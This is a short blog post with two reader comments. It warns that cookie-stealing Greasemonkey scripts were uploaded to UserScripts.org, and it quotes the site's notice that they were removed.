Well, this is one of those security issues that everybody always knew was there – but the community usually did a good job at policing it themselves to where it did not become an issue. It looks like somebody has been creating and uploading Greasemonkey scripts that steal your cookies. Since your cookies store a lot of information about you – you can see this is a kind of big deal here.
Here is the post that got my attention on UserScripts.org:
Someone has been attempting to post scripts that steal cookies. Thanks to several alert us.o citizens (including davey, descriptor, loucypher, joel h, pogue) we have been able to note that the script is malicious and then delete them.
I’m putting up a banner to warn people that newly uploaded/updated scripts should be put under extra scrutiny.
I’ve also decreased the cache duration of rss feeds to 10 minutes, so if you keep an eye on http://userscripts.org/feeds/recent_scripts it will be a lot fresher than normal (it was cached for an hour)
So yes, everybody should be extra careful when downloading scripts like this – even if it is from a trusted source. I am happy to see the UserScripts.org team moved so quickly on this though. That makes me feel a lot better about my continued use of their Firefox extension.
Need Help? Be sure to check out the Beginner’s Guide to Greasemonkey!
This is scary indeed. It goes to show that we should view user scripts like .exe files – with great suspicion. I just wrote a blog entry on this issue that you might find interesting:
http://dev2dev.bea.com/blog/plaird/archive/2007/08/enterprise_grea.html
Very interesting read indeed, thanks for the heads up!